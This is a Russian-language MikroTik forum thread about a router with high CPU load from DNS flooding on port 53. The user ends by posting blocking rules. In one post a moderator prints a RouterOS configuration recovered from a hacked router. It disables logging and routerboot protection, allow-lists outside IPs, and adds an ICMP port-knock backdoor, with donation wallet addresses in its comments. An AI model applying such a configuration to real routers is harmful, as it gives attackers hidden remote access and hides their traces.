Частичная не работоспособность, в логе: memory info fetch file cko downloaded

Обсуждение ОС и пр.
Аватара пользователя
podarok66
Модератор
Сообщения: 2855
Зарегистрирован: 11 фев 2012, 18:49
Откуда: МО

11 июл 2018, 21:37

Ясно, спасибо за консультацию.


Мануалы изучил и нигде не ошибся? Фаервол отключил? Очереди погасил? Витая пара проверена? ... Тогда Netinstal'ом железку прошей и настрой ее заново. Что, все равно не фурычит? Тогда к нам. Если не подскажем, хоть посочувствуем...
rampage
Сообщения: 5
Зарегистрирован: 02 июл 2018, 15:28

Вчера, 11:53

Шедулер и Script List девственно пусты:

Изображение Изображение


Заметил большую загрузку процессора:

Изображение Изображение

Изображение Изображение

С одного IP постоянно идёт большой поток данных в несколько мегабит. Возможно от этого загрузка идёт? Что это и как побороть?

Иногда это соединение пропадает на несколько минут - нагрузка сразу падает до околонулевой...
Последний раз редактировалось rampage 19 июл 2018, 23:09, всего редактировалось 4 раза.


Аватара пользователя
podarok66
Модератор
Сообщения: 2855
Зарегистрирован: 11 фев 2012, 18:49
Откуда: МО

Вчера, 20:25

Так, прислали образец кода со взломанного роутера. Работал года полтора на старом программном обеспечении.

Код: Выделить всё

/system logging
set 0 disabled=yes
set 1 disabled=yes
set 2 disabled=yes
set 3 disabled=yes
add disabled=yes topics=e-mail
/system note
set note="The security flaw for Hajime is closed by the firewall. Please updat\
    e RotherOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk\
    3nUgsdqQawiMLC1bUGDZWHowix1"
/system routerboard settings
set memory-frequency=1200DDR protected-routerboot=disabled
/ip firewall address-list
add address=10.9.0.1 list=allow-ip
add address=10.10.0.0/24 list=allow-ip
add address=10.10.0.7 list=allow-ip
add address=94.170.104.35 list=allow-ip
add address=128.174.197.214 list=allow-ip
add address=192.168.88.0/24 list=allow-ip
add address=192.168.100.0/24 list=allow-ip
add address=192.168.101.0/24 list=allow-ip
/ip firewall filter
add action=tarpit chain=input comment=\
    "Add you ip addess to allow-ip in Address Lists." dst-port=30553 \
    protocol=tcp
add action=add-src-to-address-list address-list=allow-ip \
    address-list-timeout=1h chain=input comment=\
    "The security flaw for Hajime is closed by the firewall." packet-size=\
    1083 protocol=icmp
add action=accept chain=input comment=\
    "Please update RotherOS and change password." src-address-list=allow-ip
add action=drop chain=input comment=\
    " Thanks are accepted on WebMoney Z399578297824" dst-port=53 protocol=udp
add action=drop chain=input comment=\
    "or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1" dst-port=\
    53,8728,8729,21,22,23,80,443,8291 protocol=tcp
На первый взгляд - это просто предупреждение в такой форме. Но сама легкость взлома (логин там абсолютно зубодробительный был, просто так не подберёшь) ещё раз убеждает в том, что обновляться надо вовремя.


Мануалы изучил и нигде не ошибся? Фаервол отключил? Очереди погасил? Витая пара проверена? ... Тогда Netinstal'ом железку прошей и настрой ее заново. Что, все равно не фурычит? Тогда к нам. Если не подскажем, хоть посочувствуем...
vqd
Модератор
Сообщения: 3292
Зарегистрирован: 26 сен 2013, 14:20
Откуда: НСК
Контактная информация:

Сегодня, 06:01

rampage писал(а):
Вчера, 11:53

С одного IP постоянно идёт большой поток данных в несколько мегабит. Возможно от этого загрузка идёт? Что это и как побороть?

Иногда это соединение пропадает на несколько минут - нагрузка сразу падает до околонулевой...
У вас же на скринах есть вся необходимая информация что бы понять в чем проблемма то )) Ну вот прямо написано "флуд по 53 порту"

В фаерволе правила соответсвующие сделате и будет Вам счастье


Есть интересная задача и бюджет? http://mikrotik.site
rampage
Сообщения: 5
Зарегистрирован: 02 июл 2018, 15:28

Сегодня, 10:46

Сделал два правила:

1) Блокирую всех из DNS_BLOCK по всем портам и протоколам
chain=input action=drop src-address-list=DNS_BLOCK in-interface=Internet log=no log-prefix=""

2) В список адресов DNS_BLOCK добавляю флудящие IP
chain=input action=add-src-to-address-list protocol=udp address-list=DNS_BLOCK address-list-timeout=0s in-interface=Internet dst-port=53 log=yes log-prefix=""



За ночь в DNS_BLOCK 90 адресов... Нагрузка уменьшилась до 0-5%

Правильно всё сделал?


Ответить